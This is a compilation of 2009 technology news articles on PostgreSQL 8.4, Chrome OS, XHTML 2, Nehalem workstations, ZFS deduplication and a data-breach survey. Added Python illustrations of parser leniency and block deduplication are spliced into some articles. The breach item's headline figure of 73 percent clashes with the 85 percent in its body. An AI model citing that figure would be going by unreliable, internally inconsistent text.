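SELECT smallest(10, 4.5, 7);                  -- individual arguments
SELECT smallest(VARIADIC ARRAY[3, 2, 1]);     -- or an array passed as-is
```

The cycle guard in the recursive query is the check a practitioner should not leave out: the standard syntax has no built-in recursion limit, so a single bad manager_id loop in the data turns the query into an unbounded walk that ties up a backend until `statement_timeout` (if one is set) cuts it off.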
The blow-by-blow feature list for PostgreSQL 8.4 is in the release notes, and the project has put together a feature matrix so you can see the evolution of PostgreSQL from the 7.4 through 8.4 releases. PostgreSQL 8.4 comes in pre-compiled binaries for FreeBSD, Linux, Mac OS X, Solaris (the x64 version of Solaris 10 only), and Windows operating systems. If you are a real do-it-yourselfer, it is possible to compile PostgreSQL source code to run on AIX, HP-UX, SCO UnixWare and OpenServer, and Irix Unixes, and it can run on just about any chip architecture you can name, as the release notes show. ®
InfoWorld: Update: Google to launch open-source Chrome OS this year
by Martyn Williams
Google is developing an open-source operating system targeted at Internet-centric computers such as netbooks and will release it later this year, the company said Wednesday.
The OS, which will carry the same "Chrome" name as the company's browser, is expected to begin appearing on netbook computers in the second half of 2010, Google said in a blog post.
It is already talking to "multiple" companies about the project, it added.
The Chrome OS will be available for computers based on the x86 architecture, which is used by Intel and Advanced Micro Devices (AMD), and the Arm architecture.
Prototypes of Arm-based netbooks began appearing last month at the Computex show in Taiwan, and Google's support for the architecture could give it a significant boost. Microsoft's mainstream Windows operating system doesn't run on Arm chips, so many manufacturers were talking about using Linux or a version of Google's Android operating system. It's not immediately clear how much code the two Google operating systems share, but Google said they are aimed at very different devices.
"Google Chrome OS is a new project, separate from Android," it said. "Android was designed from the beginning to work across a variety of devices from phones to set-top boxes to netbooks. Google Chrome OS is being created for people who spend most of their time on the Web."
While Google is initially looking at the netbook segment of the market it might compete with Microsoft and Apple on larger, Internet-centric machines.
Chrome OS is "being designed to power computers ranging from small netbooks to full-size desktop systems," said Google.
The heart of Chrome OS is the Linux kernel. Applications, which can be written in standard Web programming languages, will run inside Google Chrome in a new windowing system. They will additionally run inside the Chrome browser on Windows, Mac or Linux machines, meaning that a single application could run on almost any computer.
Wide support for the platform will be key to getting developers involved and so an important factor in its degree of success.
"We have a lot of work to do, and we're definitely going to need a lot of help from the open source community to accomplish this vision," Google said in its blog post.
For end users Google promised a better computing experience on machines with faster access to e-mail, fast boot-up times, access to data from anywhere and the end of problematic hardware configuration, software updates and security issues.
"We are going back to the basics and completely redesigning the underlying security architecture of the OS so that users don't have to deal with viruses, malware and security updates. It should just work," Google said.
CNet: An epitaph for the Web standard, XHTML 2
by Stephen Shankland
XHTML 2, we hardly knew you.
XHTML 2, a technology intended to build a more powerful Web from the ground up, met a quiet end last week, spotlighting the difficulties of standardization in a fast-moving Internet. Introduced in 2002, XHTML 2 was a centerpiece of standards work at the World Wide Web Consortium (W3C).
But incompatibility with the existing Web and a direction at odds with Web developers' desires doomed it to a slow demise. On Thursday, after a long reconciliation with browser makers who'd struck off in a different direction, the W3C announced that it will wind down development of XHTML 2 this year.
Instead, the group will channel those resources into standardizing what the browser makers have been toiling on all these years: HTML 5, a sprawling collection of new features to improve the present Hypertext Markup Language. Although elements of XHTML 2 will live on in HTML 5, overall, the browser makers prevailed.
"XHTML 2 was a beautiful specification of philosophical purity that had absolutely no resemblance to the real world," said Bruce Lawson, HTML 5 evangelist for browser maker Opera.
So what went wrong? In short, the Web has many masters, but the ones with final say over its nature are those who build it page by page, not the standards group trying to create a new foundation.
XHTML 2 was designed to reform the Web as a medium for publishing documents, but the developers, and the browser makers who listened closely to those developers, instead wanted a platform for interactive applications. And while that direction prevailed, its incarnation in HTML 5 faces its own set of challenges now.
The consensus for HTML 5 support has been building for years, and the W3C already had been increasing its involvement in its standardization well before it decided to put an end to much of the competing XHTML 2 standard. Although the HTML-XHTML split has been fractious at times, there's inescapable tension between standards groups trying to chart the future and vendors whose products relate to those standards.
"I will not say it's been the smoothest way of doing things, but it's not an unnatural way for things to proceed," said Mike Smith, leader of HTML work at W3C, speaking of the reconciliation process that rejuvenated the W3C's HTML work. "Vendors are the ones who drive innovation on the Web for the most part."
Why XHTML?
So if it's so clear today that HTML 5 is the way to go, why was so much energy, time, and research invested in XHTML 2? It was an attempt to start afresh without HTML's shortcomings.
The X in XHTML stands for XML, which in turn stands for Extensible Markup Language. XML is a broad technology that uses a strict set of tags to label different types of content in a document, and XHTML was engineered specifically for the Web. XHTML brought rigor to the loosey-goosey and slap-dash world of HTML, and it would have permitted developers to employ a broader range of computing engines called parsers to digest and process the XML, Smith said.
XHTML "was a cleaner and better-architected version of HTML," Smith said. And in its earlier years, it had support. "At the time when XHTML 2 was first conceived and specified in the early drafts, most everybody thought it was a good idea. A lot of people in hindsight want to look back at it now and make the claim that they knew it wasn't going to have success," Smith said.
XHTML 2.0 made it to working draft stage, but only parts of the specification will live on in HTML 5.
One example of its utility is the tight coupling of textual information with graphics encoded in SVG, the Scalable Vector Graphics format, Smith said. Another advantage was better browsing with the limited abilities of mobile phones.
One of the big problems with XHTML 2 was that it wasn't backwards compatible, though. Not only could it not be used to display existing Web pages, but Web browsers had to be expanded with an entirely new engine for handling the XML. Notably, Microsoft's Internet Explorer, the dominant browser by far, couldn't handle XHTML on its own.
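The difference Smith describes, the "rigor" of XML against the tolerance of HTML, shown with an added example that is not from the article or from any of the projects it mentions. Python's standard-library XML parser stands in for an XHTML user agent and its HTML tokeniser for a browser; the four sample documents are constructed for the illustration.

```python
"""Added illustration: the same markup fed to an XML parser (as an XHTML
user agent would) and to an HTML tokeniser (as a browser does)."""
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed samples. The first three are things browsers have always
# accepted; the last is well-formed XML. Keys are just labels.
SAMPLES = {
    "tag soup":    '<p>Hello <b>world<p>second <img src=x>',  # unclosed tags, unquoted attribute
    "script":      '<script>if (a < b) alert(1)</script>',      # raw "<" inside script text
    "entity":      '<p>x &copy; y</p>',                         # named entity, no DTD declares it
    "well-formed": '<p>a &amp; b<br/></p>',
}


def parse_as_xhtml(doc):
    """XML parsing is draconian: the first well-formedness error aborts the
    whole document. Returns (element names in document order, None) on
    success or (None, error message) on failure."""
    try:
        root = ET.fromstring("<body>" + doc + "</body>")
    except ET.ParseError as err:
        return None, str(err)
    return [el.tag for el in root.iter()][1:], None  # drop the wrapper <body>


class EventCollector(HTMLParser):
    """Records start tags, end tags and text as the HTML tokeniser sees them."""

    def __init__(self):
        super().__init__()
        self.events = []

    def handle_starttag(self, tag, attrs):
        self.events.append(("start", tag))

    def handle_endtag(self, tag):
        self.events.append(("end", tag))

    def handle_data(self, data):
        # Merge adjacent text chunks so results do not depend on buffering.
        if self.events and self.events[-1][0] == "data":
            self.events[-1] = ("data", self.events[-1][1] + data)
        else:
            self.events.append(("data", data))


def parse_as_html(doc):
    """HTML tokenising never fails: it recovers and keeps going. That is why
    broken pages render, and also why two HTML consumers can disagree."""
    collector = EventCollector()
    collector.feed(doc)
    collector.close()
    return collector.events


def compare(doc):
    """Summarise how the two models treat one document."""
    xml_tags, xml_error = parse_as_xhtml(doc)
    html_events = parse_as_html(doc)
    return {
        "xml_ok": xml_error is None,
        "xml_tags": xml_tags,
        "xml_error": xml_error,
        "html_tags": [tag for kind, tag in html_events if kind == "start"],
    }


if __name__ == "__main__":
    for label, doc in SAMPLES.items():
        result = compare(doc)
        verdict = "accepted" if result["xml_ok"] else "REJECTED: " + result["xml_error"]
        print(f"{label:12} XML {verdict}; HTML start tags {result['html_tags']}")
```

Run it and the three sloppy samples are rejected outright on the XML side while the HTML side emits tags for all four. That leniency is the backward compatibility XHTML 2 lacked; it is also the reason any pipeline that filters markup with one parser and renders it with another has to confirm both agree on the same bytes, because the error-recovery rules are exactly where two parsers can part ways.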
Another problem was that there was plenty of demand for improvements to HTML, which W3C had declared finished with version 4.01 in 1999.
"People were so focused on XHTML 2 that they were substantially less interested in modifying the application model and introducing new features to HTML that developers were clamoring for," said Arun Ranganathan, standards evangelist for Mozilla, the organization behind the Firefox browser. "We felt the standards going on at the time...were disconnected from a large majority of developers."
Microsoft agrees with its browser rival.
"We've never heard a strong request from our developer audience and customers for XHTML 2," said Amy Barzdukas, general manager for IE.
Enter WHATWG
One crucial moment came five years ago when Opera and Mozilla representatives showed the W3C an idea called WebForms for improving HTML. "We jointly presented this paper to W3C, who rejected it," Lawson said.
Mozilla's Brendan Eich and Opera's Ian Hickson were displeased with how things went. "The best way to help the Web is to incrementally improve the existing web standards," concluded Eich, creator of the JavaScript Web programming language, in a blog post after the meeting.
In that post, Eich also announced an Opera and Mozilla plan to take that evolutionary route. They launched an open e-mail list called WHATWG, short for Web Hypertext Application Technology Working Group. Apple, which offers its own Safari browser, soon began participating, too.
"It became a de facto standards organization without the formality of W3C. It's where we went to figure out what the future of the Web was," Ranganathan said.
Eventually, the Web-application direction won over the W3C. "Some things are clearer with hindsight of several years. It is necessary to evolve HTML incrementally," Web founder and W3C Director Tim Berners-Lee said in 2006.
But Berners-Lee at the time also maintained the commitment to the "well-formed," more rigorous XML-based future: "It is important to maintain HTML incrementally, as well as continuing a transition to well-formed world, and developing more power in that world."
In practice, the W3C world and WHATWG world involve many of the same people. That probably eased the reconciliation to the current state, where WHATWG and W3C operate simultaneously, the first more informal and the second with more careful handling of intellectual property concerns.
Ultimately, HTML carried the day. What began with interest in more sophisticated Web sites such as eBay blossomed with the arrival of Ajax, which used JavaScript to build more sophisticated Web-based applications. And Web applications weren't just theoretical ideas.
"When Gmail and Google Maps and Ajax came along, it became really clear we needed a new set of technologies that made it easier to make those kinds of applications," Smith said.
The transition culminated with W3C's bare-bones news last week: "Today the director announces that when the XHTML 2 Working Group charter expires as scheduled at the end of 2009, the charter will not be renewed. By doing so, and by increasing resources in the HTML Working Group, W3C hopes to accelerate the progress of HTML 5 and clarify W3C's position regarding the future of HTML."
Some features of XHTML 2 will be built into HTML 5, so the XHTML 2 work won't have been for naught, assuming a critical mass of browser makers do in fact include the necessary XML parser alongside the HTML parser.
HTML 5: no walk in the park
Though the W3C-WHATWG dust has mostly settled, the standard is far from finished, and indeed looks a long way off.
The present approach involves a give and take between browser makers trying out new features and the standards group codifying them. Features can't make it to the ultimate W3C state, "final recommendation," until at least two browsers support the feature compatibly, Smith said.
In practice, that means adventurous Web developers who choose to support the new technologies in effect are blessing them even though the technology might well change.
HTML 5 elements came from all over. Canvas, which involves two-dimensional graphics, began at Apple's Safari and now has won over Opera, Firefox, and Google's Chrome. ContentEditable, which lets Web pages be edited in place, came from Microsoft. Google now is working on a faster communication feature called Web Sockets. Programmers for WebKit, the open-source project underlying Safari, are developing DataGrid, which brings spreadsheet-like tables with sorting and editing to Web pages.
"The speed of the web is continuing to pick up in general," Barzdukas said. HTML 5 feature support figures prominently in the browser sales pitches from Google and from Mozilla, with its "upgrade the Web" tag line for Firefox 3.5.
Actual standardization, though, remains distant. Mozilla's Ranganathan hopes for drafts of some HTML 5 elements this year and a draft of the full specification in 2010.
The HTML 5 built-in video situation is illustrative. Hickson, the HTML 5 editor and now Google employee, posted a lament about HTML 5 video last week because browser makers don't agree on whether to support the patent-free Ogg Theora format, preferred by Opera and Mozilla, or the commercially popular H.264 format, preferred by Google and Apple. The upshot for now: HTML 5 is trying to standardize video but doesn't specify which format to be used.
That pace of HTML 5 standardization is important, given the importance Microsoft places on supporting ratified standards and the company's commanding market share.
"The support of ratified standards (that Web developers) can use is something that we are extremely supportive of," Barzdukas said. "In some cases, it can be premature to start claiming support for standards that are not yet in fact standards."
TheRegister: TechCrunch dubs Linux a 'big ol' bag of drivers'
by Ted Dziuba
Fail and Googasm Google has announced the Google Chrome Operating System, which is the Chrome browser bundled with a Linux kernel and a handful of hardware drivers, targeted at netbooks. Yes, this time it's actually an operating system, but don't cream yourself. Yet again, there is a severe case of the media not knowing what the fuck it's talking about.
When Google Chrome was released last year, pundits completely lost their shit over it, claiming that Chrome was a new web operating system. Meanwhile, I pointed out that in fact it's a web browser and that an operating system is a very complicated piece of software that can't really be written off as "implementation details." Now, I guess Chrome is going to be even more operating-systemy, by way of including, uh, an operating system. Journalistic logic rocks.
The pundits are losing their shit all over again, which is fairly impressive, because multiple Googasms from a single product are very rare. Last year, I highlighted the glorious incompetence of writers who fancy themselves tech journalists. Much in the way that everybody who saw Sideways is now an expert on wine, the tragedy of blogging is that anybody with a laptop and a Gmail account is an expert on technology. So now that Chrome will actually be a full-fledged operating system, let's see what the experts have to say.
The canonical example of failure in tech journalism is TechCrunch, a blog that once declared Google's MapReduce to be a system that "reduced the links found on the web into a map that search algorithms could run over." Yes, this will do nicely. TechCrunch embodies all that is wrong with blogging as journalism: shoddy fact checking, writing that would fail a high school English class, and a pre-adolescent in-the-brain-out-the-mouth reporting style.
TechCrunch, um, editor Michael Arrington quotes my previous El Reg article about Chrome not being an operating system and goes on to explain:
Purists complained that a browser isn't actually an operating system, and brought up mundane issues about hardware drivers, memory, and processor management and other red herrings. Sure, they were right - the Chrome browser isn't an operating system...
Google just bolted a big ol' bag of drivers (also known as the Linux kernel) to Chrome and are calling it the Google Chrome Operating System. It's going to be hard for people to continue to deny its operating systemness now.
Proof that you can lead a horse to water, but you can't punch him in the dick without being brought up on assault and battery charges. I'm sure that Linus is pleased to see that his decades of research into operating systems amounts to nothing more than a big ol' bag of drivers for getting people to Twitter faster.
When Chrome was first released, journalists loved the idea that Google was taking on Microsoft, but it just wasn't so. Now that Google will be releasing an operating system, the Goliath vs. Goliath story gets a little clearer. Yes, Chrome OS will be competing with Windows in the netbook market, which is a tiny sliver of the PC market. No, Chrome will not replace Windows in the years to come. Let's all just calm down.
TechCrunch goes on to report: "Don't worry about those desktop apps you think you need. Office? Meh. You've got Zoho and Google Apps. You won't miss Office."
Ah, yes. Corporate IT workers everywhere have to port decades of esoteric business logic codified into Excel macros to Google Spreadsheets, but the real problem is, what are they going to do after lunch? Have you ever tried to use Google Docs for any serious task? In the words of a true hacker, it's like trying to build a bookcase out of mashed potatoes. The Microsoft Office institution will not easily be overthrown by a bunch of jokers writing JavaScript.
But it's not just Office that will keep Microsoft's hold on the PC market. Can you replace Active Directory with a web app? Is there a site I can visit to connect to my office's shared printer? What do you mean World of Warcraft doesn't run in the browser? How do I play a DVD in Google Chrome?
Keep whackin' away on that Pareto Principle and let us all know how it turns out. In the meantime, I'm going to go play a few rounds of Counterstrike on my Windows-based PC, because the best that my browser can do is Tetris. I'm sure that HTML5 will bridge that gap any day now.
The notion that Google Chrome OS is going to take any serious market share away from Windows is a product of the pathological Silicon Valley attitude that newer is always better, even if nothing has changed. In terms of functionality, web apps have been a regression from their desktop counterparts. Run business apps over a faulty network instead of from your hard disk? What could possibly go wrong? Can I buy an extended warranty with that?
As Mike Arrington says: "The Internet Is Everything. All the OS has to do is boot the damn computer, get me to a browser as fast as possible and then stay the hell out of the way."
Indeed. That's probably why desktop Linux machines with Firefox have already taken such a foothold in the consumer market.
Oh, wait. ®
InfoWorld: Nehalem workstations: A new era in performance
by Andrew Binstock
Last May, InfoWorld presented a comparative roundup of workstations built on the then-new quad-core processors. In that review, I examined an entry-level machine, two midranges, and a high-end system. While impressed by their muscle, I still felt the need to explain how those workstations were a category separate from high-end desktop systems. The Nehalem workstations I examine this year, however, require no such explanation. They move the flag forward so far that few people would consider purchasing them for standard business applications, where a good desktop or laptop would be sufficient.
In this review, I evaluate three entry-level systems (one each from Dell, HP, and Lenovo) and two midrange to high-end systems (from HP and Dell). In an ideal world, it would have been fun to allow the vendors to send their biggest, fastest system and throw those up against each other to see what shakes out. However, top-end workstations today can hold 192GB of RAM, which alone can push system costs into the multiple tens of thousands of dollars. So we settled for high-end workstations under $9,000. This left unexplored only the super-high-end market, which is dominated by specialty applications and narrow industry niches.
Why Nehalem matters
Intel's Nehalem processors represent a truly new generation in the storied x86 processor history. Their release adds so many new features to the processor family that it appears almost unrecognizable. The key new elements are a built-in memory controller on each chip and a high-speed interconnect between processors and peripherals. The interconnect, called QPI (QuickPath Interconnect), replaces the long-maligned FSB (front-side bus) that Intel chips were known for, while providing a superset of its functionality. QPI and on-chip memory controllers are both ideas initially implemented for x86 chips by AMD. In this first release, Intel has clearly refined the implementation. The result of both technologies is consistently greater levels of memory transfer than could be attained previously. (As shown in the accompanying benchmark table, the slowest system we review here has memory bandwidth that's twice that of the fastest system a year ago, even though memory latency has decreased by only around 20 percent.)
In addition to these advances, Nehalem sports two important changes. First, the cache architecture has been moved to a three-tier system from the previous two tiers. The outermost, Level 3 (L3) cache is a stout 8MB shared by all four cores. When fewer cores are busy, the remaining cores get access to more of the cache. Each core can actually run two threads at once. This SMT (simultaneous multithreading) is a redux of Intel's earlier Hyper-Threading technology, although it scales better on Nehalem than in its original implementation. Hyper-Threading means that eight threads can run at once on a single four-core processor; that's a lot of instructions in flight at any given moment.
The second important change to note is a Turbo mode that kicks in automatically when some cores are unused or underused. Their resources, including power, are contributed to the work of busy cores and can accelerate their performance by 5 to 10 percent, depending on the processor.
Given these numerous improvements, it's no wonder that Intel and its OEM partners promise a massive performance boost over the previous generation of Xeon processors.
CNet: Why Chrome OS? Google says, why not?
by Tom Krazit
Apparently, organizing the world's information and making it universally accessible and useful will require a new operating system.
Google has long worked on expanding its reach beyond mere Internet search. And as many had suspected, it confirmed late Tuesday night that it plans to develop a lightweight operating system based on Linux and Web standards for personal computers.
Why? Well, Google's standard response to any question about why it's working on something other than search is to declare that any product that helps people get on the Web, and enjoy their experience on the Web, benefits Google's advertising customers in that more Web users equals more Google searches.
Yet, Chrome OS represents something more. There's a competitive impact that can't be ignored, no matter how often Google insists that it's in this world to do good rather than inflict pain on other corporations.
Few details were available Wednesday concerning one of the most important and ambitious projects Google has ever undertaken. Sources familiar with the Chrome OS project say Google engineers have only been working on the project in earnest since the beginning of the year, so there's likely a lot that still needs to be ironed out.
Chrome OS is the byproduct of Google thinking it can do better than Windows, Mac OS X, the various flavors of Linux, and even its own Android operating system. It's long been obvious that the world has changed from a personal computing model built for individuals working offline or businesspeople sharing files across a workplace to one where the consumer/business lines have blurred and people are expected to be online anywhere and everywhere.
Accompanying that shift has been the decreasing importance of processing power and operating system complexity. For years, the dirty secret of the computer industry has been that most people don't use nearly the amount of headroom provided to them by modern microprocessors and operating systems.
After all, if you're searching the Web, sending e-mail, typing up documents, touching up photos, and updating your Facebook status (hardly an uncommon usage model), you're more concerned with speed and battery life than raw power. Those still playing Doom or editing video will always need something more robust, but most people do spend an awful lot of time in the browser and have embraced smartphones and Netbooks as a way of staying online on the go.
Google's general idea seems to be twofold. First, it wants to make it easier for regular people to use a computer by making an operating system that is fast, secure, and lightweight enough to run on portable devices.
Sources familiar with Google's plans for the Chrome OS said that the company is working on a new method of "windowing," or switching between multiple applications. Google also believes that the whole idea of storing your files and applications in folders is an archaic way of organizing your data, and plans to unveil a new user interface that handles things a little differently.
Secondly, Google believes that through the use of Web standards like HTML 5, promoted heavily during its recent Google I/O conference as the development platform of the future, software development on a browser-based OS will be easily understood by developers reared in the Web 2.0 era.

This is not a new idea. Palm is betting its future on such a strategy, having introduced WebOS on the Palm Pre as a Web-friendly development environment based on a browser engine running atop Linux. Sound familiar?
Google brings much more to bear than Palm, however. It has an entire suite of Web applications and services that already form much of what you want a computer to do: send e-mail, compose documents, edit photos, and, of course, browse the Web.
But why does Google think it needs two operating systems to address this evolving usage model? Much of the language used to introduce Chrome OS could have been pulled from a blog post two years ago introducing Android, Google's lightweight Linux-based open-source smartphone operating system.
Just a few months ago Google's Andy Rubin declared Android to be "a revolution" that would help Google conquer the write-once, run-anywhere goal that has eluded the non-Microsoft software community for so many years. And Google executives have endorsed the concept of other companies building things other than phones based on Android.
However, Android appears to now occupy a different role in Google's thinking. According to Tuesday night's blog post, "Android was designed from the beginning to work across a variety of devices from phones to set-top boxes to netbooks. Google Chrome OS is being created for people who spend most of their time on the web, and is being designed to power computers ranging from small netbooks to full-size desktop systems."
As noted, there are an awful lot of details that still need to surface before we can glean Google's true intent with Chrome OS, not to mention the potential impact. Google said it plans to release the code for Chrome OS later this year, with the expectation that devices based on the OS could arrive in the second half of 2010.
But one thing is for sure: Google's ambitions are boundless. The company is proposing to do nothing less than rewrite the rules that govern personal computing.
TheRegister: Java to offer Carbonite capture to users
by Chris Mellor
Sun customers downloading the latest version of Java will get a free 30-day trial of Carbonite Online Backup.
Carbonite reckons this will get it access to millions of Java users.
Carbonite Online Backup installs in a few clicks and runs automatically in the background, continually backing up the files on the computer, sending them in encrypted form to Carbonite's Boston and Beijing data centres. It says storage capacity is unlimited and users will never outgrow their Carbonite subscription no matter how much data they have.
Carbonite is working to get access to defined groups of users and has trial-use agreements with Lenovo for its consumer PCs, Acer and LaCie. However, LaCie is starting up its own cloud backup service and its Carbonite deal may come unstuck.
Carbonite also has distribution agreements with a small Ohio-based cable TV company, Massillon, and a few ISPs, such as Arcor in Germany and BBSoft in Japan. This Java deal is on a different level as it gives it access to many millions of Java downloaders.
So far Carbonite has not managed to do deals with retail outlets, or has avoided them. This contrasts with Spare Backup, which has just announced an expansion of one of its three UK retail deals. Although it has OEM deals, such as the one with Sony and its Vaio, the retail deals seem to be boosting Spare Backup revenues a lot.
In March, Spare Backup CEO Cery Perle said this about the first quarter results: "Our subscription numbers continue to improve ... We have benefitted from the combination of strong customer retention, as well as strong growth in new customers through the DSGi channel. We believe that the upcoming Cydcor and Currys launches will only accelerate this rate of sales growth..."
Spare Backup gets exposure to thousands of customers through hundreds of stores, people buying notebook or desktop computers. Although Carbonite probably has access to many more users, they will be existing users, not new ones with a sales rep possibly selling the Spare Backup service. Access to retail customers could be worth more, in subscription terms, than access to software-download customers who might be irritated by a longer download process.
The consumer focus of both Carbonite and Spare Backup contrasts with the enterprise customer focus of Nirvanix which has just gained US SAS 70 (Type II) to solidify its enterprise service provider credentials. ®
InfoWorld: Java development critical to Oracle Fusion strategy
by Paul Krill
For developers, Oracle's Fusion Middleware 11g rollout on Wednesday emphasizes Java technologies, particularly the company's JDeveloper IDE, along with concepts including declarative programming and ALM (application lifecycle management).
Oracle's emphasis on Java should come as further relief to Java developers, with Oracle already in the process of buying Java founder Sun Microsystems and offering reassurance to these developers at the recent JavaOne conference. The Fusion announcement featured a multifaceted suite of technologies for business IT needs, ranging from SOA deployments to cloud computing, business process transformation, and IT governance.
JDeveloper, Oracle said in one of its statements on the rollout, lets developers build applications and services across application servers; Oracle's WebLogic Java application server acquired from BEA Systems is a key part of the company's middleware line. Developers also can leverage the open source Eclipse IDE through Oracle Enterprise Pack for Eclipse, Oracle said.
"In the developer tools space, I think we're really excited with what we've done," said Ted Farrell, chief architect and senior vice president of tools and middleware at Oracle. The unveiling gets Oracle fully into the ALM space and desktop integration, he said.
As part of Wednesday's announcement, Oracle is offering an upgrade to JDeveloper, identified as version 11.1.1.1, as well as an ALM technology called Team Productivity Center. "Its goal is to bring teams together inside the IDE," Farrell said.
The ALM software lets teams track bugs together and share code, he said. "You can chat with each other right from inside the IDE," said Farrell. Developers can also work with third-party technologies such as the Subversion version control system.
All Fusion middleware products plug into JDeveloper. Asked what Oracle's emphasis on JDeveloper and Eclipse means for the Sun-dominated NetBeans IDE, Farrell said he could not comment on what Oracle might do with it. But he did call NetBeans "a viable IDE in the market today."
Oracle is leveraging its ADF (Application Development Framework) and ADF Faces, Farrell said. "Basically, what we're saying is we're trying to abstract our users building enterprise applications and Web applications from the underlying view technologies, which are constantly changing," Farrell said.
While Microsoft tells developers to build using Silverlight, Adobe stresses Flex development, and others hail "Open Web" technologies, such as JavaScript and DHTML, Oracle emphasizes abstraction, leveraging JavaServer Faces (JSF) as a component model, said Farrell. JSF is geared toward a traditional Model View Controller architecture, he said.
Google's framework is most similar to Oracle, using Java as its native language, said Farrell. With JSF, Oracle is going "the declarative route," providing an abstraction layer, he said.
Observers offered varying perspectives on Oracle's moves, with one analyst making a comparison to Microsoft's Oslo software modeling platform.
CNet: Firefox, Mac OS 9, and the power of open source
by Matt Asay
Despite the occasional usability snag, one of the very best things about open source is the diversity of development "itches" that can be "scratched," to use Eric Raymond's parlance. This is borne out in the news that the popular Mozilla Firefox browser has been ported to the Mac OS 9 platform.
Dubbed "Classilla," it's an effort to keep Apple's classic OS 9 alive and kicking by bringing the power of modern browser technology to an old operating system.
According to the project developers, however, it also "establishes a template for other free open-source projects to follow," namely "By putting the ability to maintain our own software in our own hands, as users of classic Macs, we ensure that OS 9 will continue to survive."
In other words, Classilla demonstrates what open-source software has long allowed: developers and users can take their fates into their own hands, rather than being overly reliant on a vendor.
So, if you're feeling ambitious, join the effort. Or you could instead contribute to the Firefox port for the Amiga (Amizilla). You have nothing to lose but your chains (and quite possibly your sanity).
TheRegister: Sun setting dedupe up for ZFS
by Chris Mellor
Oracle/Sun's ZFS file system seems set to get deduplication added to it later this year.
ZFS, or the Zettabyte File System, is a 128-bit file system that Sun says radically simplifies file system administration. Amongst its features are 256-bit block checksums that detect silent data corruption and, where a redundant copy of the block exists, correct it. In other words, it already looks at every data block inside the file system and checks its integrity, and the same per-block checksum could be extended to serve as the lookup key for finding duplicated blocks or groups of blocks.
A thread on the OpenSolaris.org website mentions ZFS deduplication. Responses indicate that a synchronous version is being developed, one that works as data comes in. A background or asynchronous mode is also mentioned.
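The mechanics the two paragraphs above describe, as an added illustration rather than any ZFS code: a toy block store that records a checksum for every block, reuses that checksum as the dedup-table key, and resolves duplicates either on the write path (the synchronous mode) or in a later background pass (the asynchronous mode). The block size, the SHA-256 checksum, the table layout and the optional byte-for-byte compare on a checksum hit (the guard against a hash collision) are all my assumptions, not a description of Sun's design.

```python
"""Checksum-keyed block deduplication, inline and offline (added illustration, not ZFS)."""
import hashlib
from dataclasses import dataclass, field

BLOCK_SIZE = 4096  # assumed fixed block size for the toy store


def checksum(block: bytes) -> str:
    return hashlib.sha256(block).hexdigest()


def split_blocks(data: bytes) -> list:
    return [data[i:i + BLOCK_SIZE] for i in range(0, len(data), BLOCK_SIZE)]


@dataclass
class BlockStore:
    dedup: bool = True     # deduplicate on the write path (synchronous mode)
    verify: bool = True    # byte-compare on a checksum match before sharing a block
    blocks: dict = field(default_factory=dict)    # block id -> bytes (physical storage)
    sums: dict = field(default_factory=dict)      # block id -> checksum recorded at write time
    refcount: dict = field(default_factory=dict)  # block id -> number of references
    ddt: dict = field(default_factory=dict)       # checksum -> block id (dedup table)
    _next: int = 0

    def _store(self, block: bytes) -> int:
        bid = self._next
        self._next += 1
        self.blocks[bid] = block
        self.sums[bid] = checksum(block)
        self.refcount[bid] = 1
        return bid

    def write(self, data: bytes) -> list:
        """Write a file and return its block ids; with dedup on, duplicates are resolved inline."""
        ids = []
        for block in split_blocks(data):
            key = checksum(block)
            hit = self.ddt.get(key) if self.dedup else None
            if hit is not None and (not self.verify or self.blocks[hit] == block):
                self.refcount[hit] += 1   # share the existing block instead of storing a copy
                ids.append(hit)
                continue
            bid = self._store(block)
            if self.dedup:
                self.ddt[key] = bid
            ids.append(bid)
        return ids

    def read(self, ids: list) -> bytes:
        return b"".join(self.blocks[i] for i in ids)

    def dedup_offline(self) -> dict:
        """Background (asynchronous) pass over blocks written before dedup was turned on.
        Returns {removed id: surviving id} so the caller can rewrite its block pointers."""
        remap = {}
        for bid in sorted(self.blocks):
            key = self.sums[bid]
            keeper = self.ddt.get(key)
            if keeper is None:
                self.ddt[key] = bid
            elif keeper != bid and (not self.verify or self.blocks[keeper] == self.blocks[bid]):
                self.refcount[keeper] += self.refcount.pop(bid)
                del self.blocks[bid]
                del self.sums[bid]
                remap[bid] = keeper
        return remap

    def scrub(self) -> list:
        """Re-checksum every stored block; ids whose bytes no longer match are silent corruption."""
        return [bid for bid, blk in self.blocks.items() if checksum(blk) != self.sums[bid]]

    def physical_bytes(self) -> int:
        return sum(len(b) for b in self.blocks.values())


if __name__ == "__main__":
    store = BlockStore(dedup=False)
    payload = b"A" * BLOCK_SIZE + b"B" * BLOCK_SIZE   # constructed sample file
    first = store.write(payload)
    second = store.write(payload)                    # same file twice, no dedup yet
    print("before:", store.physical_bytes())
    store.dedup = True
    remap = store.dedup_offline()
    second = [remap.get(i, i) for i in second]
    print("after offline dedup:", store.physical_bytes(), "restore ok:", store.read(second) == payload)
    print("inline hit:", store.write(b"A" * BLOCK_SIZE) == [first[0]])
    store.blocks[first[1]] = b"B" * (BLOCK_SIZE - 1) + b"C"   # simulate a flipped byte on disk
    print("corrupt blocks:", store.scrub())
```

The two modes share one table: the write path consults it before storing, the background pass rebuilds it from the checksums already on record and folds duplicates. Leaving `verify` on costs a read per hit but means a checksum collision can never silently point two files at the wrong bytes; the scrub at the end shows the same checksums doing their original job of catching corruption.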
Later this month there will be a Kernel Conference in Brisbane, Australia, running from July 15 to July 17. The agenda includes a "Deduplication in ZFS" opening keynote, presented by Jeff Bonwick and Bill Moore. Jeff Bonwick is a Sun Fellow and VP, and the chief architect of ZFS. Bill Moore is a Distinguished Engineer at Sun and co-led the ZFS project with Bonwick.
That seems pretty solid. ®
InternetNews: Report: 73 Percent of U.S. Businesses Breached
by Alex Goldman
The fourth annual U.S. Encryption Trends Study was released today by The Ponemon Institute. The study says that 85 percent of surveyed businesses have experienced a data breach in the past year, up from 60 percent in the 2008 study. The report was sponsored by encryption supplier PGP Corp.
"A data breach is defined as the loss or theft of confidential or sensitive data including information about people and households," said Dr. Larry Ponemon, chairman and founder of The Ponemon Institute, in an e-mail to InternetNews.com.
The numbers are comparable to a similar study released last week concerning UK businesses. There, the Ponemon Institute found that 70 percent had been breached in the last year.
The report was based on surveys with nearly a thousand (997) U.S.-based executives.
Organizations need to have a holistic data encryption strategy, according to the report.
"For the second year in a row, organizations with no encryption strategy accounted for all the organizations that suffered five or more data breaches (13 percent)," the report said.
Organizations are adopting encryption to comply with industry regulations and state and federal laws, the report explained.
A flood of data breaches

